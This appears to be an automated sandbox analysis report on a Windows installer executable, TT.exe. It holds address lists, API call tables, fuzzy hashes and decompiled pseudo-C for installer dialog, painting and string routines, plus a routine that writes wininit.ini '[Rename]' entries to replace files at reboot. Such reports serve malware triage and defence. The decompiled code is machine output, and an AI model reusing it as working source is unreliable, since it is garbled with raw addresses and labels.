                                                0x00404144
                                                0x00404146
                                                0x00000000
                                                0x0040414c
                                                0x0040414c
                                                0x0040414e
                                                0x00000000
                                                0x00000000
                                                0x00404154
                                                0x00404158
                                                0x0040417d
                                                0x00404183
                                                0x00404189
                                                0x0040418b
                                                0x00000000
                                                0x00000000
                                                0x004041b1
                                                0x004041b7
                                                0x004041b9
                                                0x004041be
                                                0x00000000
                                                0x00000000
                                                0x004041c4
                                                0x004041c7
                                                0x004041ca
                                                0x004041e1
                                                0x004041ed
                                                0x00404206
                                                0x00404210
                                                0x00404215
                                                0x0040421b
                                                0x00000000
                                                0x00000000
                                                0x00404225
                                                0x00404230
                                                0x00000000
                                                0x00404230
                                                0x0040415a
                                                0x00404160
                                                0x00000000
                                                0x00000000
                                                0x00404166
                                                0x0040416c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404172
                                                0x00404146
                                                0x0040423d
                                                0x00404249
                                                0x00404250
                                                0x00000000
                                                0x00403fa0
                                                0x00403fa0
                                                0x00403fa3
                                                0x00403fd6
                                                0x00403fd6
                                                0x00403fd8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403fd8
                                                0x00403fa9
                                                0x00403fae
                                                0x00403fb0
                                                0x00000000
                                                0x00000000
                                                0x00403fc0
                                                0x00403fc8
                                                0x00000000
                                                0x00403fce
                                                0x00403dfc
                                                0x00403dfc
                                                0x00403e00
                                                0x00403e05
                                                0x00403e14
                                                0x00403e14
                                                0x00403e1d
                                                0x00403e26
                                                0x00403e31
                                                0x00403e31
                                                0x00403e3d
                                                0x00403e59
                                                0x00403e5c
                                                0x00403e6f
                                                0x00403e75
                                                0x00403f18
                                                0x00000000
                                                0x00403f21
                                                0x00403e7b
                                                0x00403e88
                                                0x00403e8a
                                                0x00403e8c
                                                0x00403eab
                                                0x00403eab
                                                0x00403eae
                                                0x00403eb3
                                                0x00403eb6
                                                0x00403ec6
                                                0x00403ec7
                                                0x00403ec9
                                                0x00403eff
                                                0x00403f12
                                                0x00000000
                                                0x00403f12
                                                0x00403ecb
                                                0x00403ed1
                                                0x00403eea
                                                0x00403eef
                                                0x00403ef1
                                                0x00000000
                                                0x00000000
                                                0x00403ef3
                                                0x00403edf
                                                0x00403edf
                                                0x00403ee1
                                                0x00403ee1
                                                0x00000000
                                                0x00403ee1
                                                0x00403ed4
                                                0x00403ed9
                                                0x00000000
                                                0x00403ed9
                                                0x00403eb8
                                                0x00403ebe
                                                0x00000000
                                                0x00000000
                                                0x00403ec0
                                                0x00000000
                                                0x00403ec0
                                                0x00403eb0
                                                0x00000000
                                                0x00403eb0
                                                0x00403e96
                                                0x00403e9d
                                                0x00403ea3
                                                0x00403ea5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ea5
                                                0x00403e61
                                                0x00000000
                                                0x00403e3f
                                                0x00403e45
                                                0x00403e4f
                                                0x00404256
                                                0x0040425c
                                                0x0040425e
                                                0x00404264
                                                0x00404269
                                                0x0040426f
                                                0x0040426f
                                                0x00404264
                                                0x00404279
                                                0x00000000
                                                0x00404279
                                                0x00403e3d

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                                • ShowWindow.USER32(?), ref: 00403E31
                                                • DestroyWindow.USER32 ref: 00403E45
                                                • SetWindowLongA.USER32 ref: 00403E61
                                                • GetDlgItem.USER32 ref: 00403E82
                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E96
                                                • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                                • GetDlgItem.USER32 ref: 00403F4B
                                                • GetDlgItem.USER32 ref: 00403F55
                                                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F6F
                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC0
                                                • GetDlgItem.USER32 ref: 00404066
                                                • ShowWindow.USER32(00000000,?), ref: 00404087
                                                • EnableWindow.USER32(?,?), ref: 00404099
                                                • EnableWindow.USER32(?,?), ref: 004040B4
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CA
                                                • EnableMenuItem.USER32 ref: 004040D1
                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040E9
                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004040FC
                                                • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                                • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                                • ShowWindow.USER32(?,0000000A), ref: 00404269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID: PB
                                                • API String ID: 184305955-3196168531
                                                • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                                • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x6ab3d5
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}



















                                                0x00404427
                                                0x00404539
                                                0x0040454c
                                                0x004045a8
                                                0x004045a8
                                                0x004045ac
                                                0x00404672
                                                0x00404679
                                                0x0040467b
                                                0x0040467b
                                                0x0040467b
                                                0x00404681
                                                0x00404681
                                                0x00404684
                                                0x00000000
                                                0x0040468b
                                                0x004045ba
                                                0x004045bc
                                                0x004045bf
                                                0x004045c6
                                                0x004045c8
                                                0x004045cf
                                                0x004045d1
                                                0x004045d4
                                                0x004045d7
                                                0x004045dc
                                                0x004045e2
                                                0x004045e5
                                                0x004045ec
                                                0x004045fa
                                                0x00404612
                                                0x00404614
                                                0x00404616
                                                0x0040461c
                                                0x0040462b
                                                0x0040462d
                                                0x0040462d
                                                0x004045ec
                                                0x004045cf
                                                0x00404630
                                                0x00404637
                                                0x00000000
                                                0x00404639
                                                0x00404639
                                                0x00404640
                                                0x00000000
                                                0x00000000
                                                0x00404642
                                                0x00404646
                                                0x00404657
                                                0x00404657
                                                0x00404659
                                                0x0040465d
                                                0x0040466b
                                                0x0040466b
                                                0x00000000
                                                0x0040466f
                                                0x00404637
                                                0x00404554
                                                0x00404557
                                                0x00000000
                                                0x00000000
                                                0x0040455f
                                                0x00404565
                                                0x00000000
                                                0x00000000
                                                0x00404571
                                                0x00404574
                                                0x00404577
                                                0x00000000
                                                0x00000000
                                                0x0040459a
                                                0x0040459a
                                                0x0040459c
                                                0x0040459e
                                                0x004045a3
                                                0x00000000
                                                0x0040442d
                                                0x0040442d
                                                0x00404430
                                                0x00404435
                                                0x00404437
                                                0x00404446
                                                0x00404446
                                                0x0040444d
                                                0x00404450
                                                0x00404452
                                                0x00404457
                                                0x00404460
                                                0x00404466
                                                0x00404472
                                                0x00404475
                                                0x0040447e
                                                0x00404483
                                                0x00404486
                                                0x0040448b
                                                0x004044a2
                                                0x004044a9
                                                0x004044bc
                                                0x004044bf
                                                0x004044d4
                                                0x004044db
                                                0x004044e0
                                                0x004044e5
                                                0x004044e5
                                                0x004044f4
                                                0x00404503
                                                0x00404515
                                                0x0040451a
                                                0x0040452a
                                                0x0040452c
                                                0x00000000
                                                0x00404532

                                                APIs
                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044A2
                                                • GetDlgItem.USER32 ref: 004044B6
                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044D4
                                                • GetSysColor.USER32(?), ref: 004044E5
                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004044F4
                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404503
                                                • lstrlenA.KERNEL32(?), ref: 00404506
                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404515
                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040452A
                                                • GetDlgItem.USER32 ref: 0040458C
                                                • SendMessageA.USER32(00000000), ref: 0040458F
                                                • GetDlgItem.USER32 ref: 004045BA
                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004045FA
                                                • LoadCursorA.USER32 ref: 00404609
                                                • SetCursor.USER32(00000000), ref: 00404612
                                                • LoadCursorA.USER32 ref: 00404628
                                                • SetCursor.USER32(00000000), ref: 0040462B
                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404657
                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040466B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: N$6B
                                                • API String ID: 3103080414-649610290
                                                • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                                • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                0x00405e97
                                                0x00405ea0
                                                0x00405ea7
                                                0x00405ebb
                                                0x00405ee3
                                                0x00405eea
                                                0x00405eee
                                                0x00405ef2
                                                0x00405f12
                                                0x00405f19
                                                0x00405f23
                                                0x00405f30
                                                0x00405f35
                                                0x00405f3a
                                                0x00405f3e
                                                0x00405f4d
                                                0x00405f4f
                                                0x00405f5c
                                                0x00405f60
                                                0x00405ffb
                                                0x00000000
                                                0x00405f76
                                                0x00405f83
                                                0x00405fa7
                                                0x00405fab
                                                0x00405fca
                                                0x00405fce
                                                0x00405fce
                                                0x00405fd0
                                                0x00405fd9
                                                0x00405fe4
                                                0x00405fef
                                                0x00405ff5
                                                0x00000000
                                                0x00405ff5
                                                0x00405fad
                                                0x00405fb0
                                                0x00405fbb
                                                0x00405fb7
                                                0x00405fb9
                                                0x00405fba
                                                0x00405fba
                                                0x00405fc2
                                                0x00405fc4
                                                0x00000000
                                                0x00405fc4
                                                0x00405f8e
                                                0x00405f94
                                                0x00000000
                                                0x00405f94
                                                0x00405f60
                                                0x00405f3e
                                                0x00405ebd
                                                0x00405ec8
                                                0x00405ed1
                                                0x00405ed5
                                                0x00000000
                                                0x00000000
                                                0x00405ed5
                                                0x00406006

                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406028,?,?), ref: 00405EC8
                                                • GetShortPathNameA.KERNEL32 ref: 00405ED1
                                                  • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                  • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                • GetShortPathNameA.KERNEL32 ref: 00405EEE
                                                • wsprintfA.USER32 ref: 00405F0C
                                                • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                                • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                • GlobalFree.KERNEL32 ref: 00405FF5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405FFC
                                                  • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00405DC5
                                                  • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %s=%s$[Rename]$*B$.B$.B
                                                • API String ID: 2171350718-3836630945
                                                • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                                • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                                • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x6ab3d5
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
